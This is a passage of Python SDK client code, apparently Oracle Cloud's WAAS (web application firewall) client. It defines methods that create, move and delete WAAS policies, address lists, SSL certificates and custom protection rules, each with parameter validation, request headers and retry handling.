for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_custom_protection_rule_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_custom_protection_rule_compartment_details)
def change_waas_policy_compartment(self, waas_policy_id, change_waas_policy_compartment_details, **kwargs):
"""
Moves WAAS policy into a different compartment. When provided, If-Match is checked against ETag values of the WAAS policy.
For information about moving resources between compartments, see `Moving Resources to a Different Compartment`__.
__ https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.ChangeWaasPolicyCompartmentDetails change_waas_policy_compartment_details: (required)
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/change_waas_policy_compartment.py.html>`__ to see an example of how to use change_waas_policy_compartment API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_waas_policy_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_waas_policy_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_waas_policy_compartment_details)
def create_address_list(self, create_address_list_details, **kwargs):
"""
Creates an address list in a set compartment and allows it to be used in a WAAS policy and referenced by access rules. Addresses can be IP addresses and CIDR notations.
:param oci.waas.models.CreateAddressListDetails create_address_list_details: (required)
The details of the address list resource to create.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressList`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/create_address_list.py.html>`__ to see an example of how to use create_address_list API.
"""
resource_path = "/addressLists"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_address_list got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_address_list_details,
response_type="AddressList")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_address_list_details,
response_type="AddressList")
def create_certificate(self, create_certificate_details, **kwargs):
"""
Allows an SSL certificate to be added to a WAAS policy. The Web Application Firewall terminates SSL connections to inspect requests in runtime, and then re-encrypts requests before sending them to the origin for fulfillment.
For more information, see `WAF Settings`__.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafsettings.htm
:param oci.waas.models.CreateCertificateDetails create_certificate_details: (required)
The details of the SSL certificate resource to create.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.Certificate`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/create_certificate.py.html>`__ to see an example of how to use create_certificate API.
"""
resource_path = "/certificates"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_certificate got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_certificate_details,
response_type="Certificate")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_certificate_details,
response_type="Certificate")
def create_custom_protection_rule(self, create_custom_protection_rule_details, **kwargs):
"""
Creates a new custom protection rule in the specified compartment.
Custom protection rules allow you to create rules in addition to the rulesets provided by the Web Application Firewall service, including rules from `ModSecurity`__. The syntax for custom rules is based on the ModSecurity syntax. For more information about custom protection rules, see `Custom Protection Rules`__.
__ https://modsecurity.org/
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/customprotectionrules.htm
:param oci.waas.models.CreateCustomProtectionRuleDetails create_custom_protection_rule_details: (required)
The details of the custom protection rule.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.CustomProtectionRule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/create_custom_protection_rule.py.html>`__ to see an example of how to use create_custom_protection_rule API.
"""
resource_path = "/customProtectionRules"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_custom_protection_rule got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_custom_protection_rule_details,
response_type="CustomProtectionRule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_custom_protection_rule_details,
response_type="CustomProtectionRule")
def create_waas_policy(self, create_waas_policy_details, **kwargs):
"""
Creates a new Web Application Acceleration and Security (WAAS) policy in the specified compartment. A WAAS policy must be established before creating Web Application Firewall (WAF) rules. To use WAF rules, your web application's origin servers must defined in the `WaasPolicy` schema.
A domain name must be specified when creating a WAAS policy. The domain name should be different from the origins specified in your `WaasPolicy`. Once domain name is entered and stored, it is unchangeable.
Use the record data returned in the `cname` field of the `WaasPolicy` object to create a CNAME record in your DNS configuration that will direct your domain's traffic through the WAF.
For the purposes of access control, you must provide the OCID of the compartment where you want the service to reside. For information about access control and compartments, see `Overview of the IAM Service`__.
You must specify a display name and domain for the WAAS policy. The display name does not have to be unique and can be changed. The domain name should be different from every origin specified in `WaasPolicy`.
All Oracle Cloud Infrastructure resources, including WAAS policies, receive a unique, Oracle-assigned ID called an Oracle Cloud Identifier (OCID). When a resource is created, you can find its OCID in the response. You can also retrieve a resource's OCID by using a list API operation for that resource type, or by viewing the resource in the Console. Fore more information, see `Resource Identifiers`__.
**Note:** After sending the POST request, the new object's state will temporarily be `CREATING`. Ensure that the resource's state has changed to `ACTIVE` before use.
__ https://docs.cloud.oracle.com/iaas/Content/Identity/Concepts/overview.htm
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param oci.waas.models.CreateWaasPolicyDetails create_waas_policy_details: (required)
The details of the WAAS policy.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/create_waas_policy.py.html>`__ to see an example of how to use create_waas_policy API.
"""
resource_path = "/waasPolicies"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_waas_policy got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_waas_policy_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_waas_policy_details)
def delete_address_list(self, address_list_id, **kwargs):
"""
Deletes the address list from the compartment if it is not used.
:param str address_list_id: (required)
The `OCID`__ of the address list. This number is generated when the address list is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/delete_address_list.py.html>`__ to see an example of how to use delete_address_list API.
"""
resource_path = "/addressLists/{addressListId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_address_list got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"addressListId": address_list_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_certificate(self, certificate_id, **kwargs):
"""
Deletes an SSL certificate from the WAAS service.
:param str certificate_id: (required)
The `OCID`__ of the SSL certificate used in the WAAS policy. This number is generated when the certificate is added to the policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/delete_certificate.py.html>`__ to see an example of how to use delete_certificate API.
"""
resource_path = "/certificates/{certificateId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_certificate got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"certificateId": certificate_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_custom_protection_rule(self, custom_protection_rule_id, **kwargs):
"""
Deletes a Custom Protection rule.
:param str custom_protection_rule_id: (required)
The `OCID`__ of the custom protection rule. This number is generated when the custom protection rule is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/delete_custom_protection_rule.py.html>`__ to see an example of how to use delete_custom_protection_rule API.
"""
resource_path = "/customProtectionRules/{customProtectionRuleId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_custom_protection_rule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"customProtectionRuleId": custom_protection_rule_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_waas_policy(self, waas_policy_id, **kwargs):
"""
Deletes a policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/delete_waas_policy.py.html>`__ to see an example of how to use delete_waas_policy API.
"""
resource_path = "/waasPolicies/{waasPolicyId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_waas_policy got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
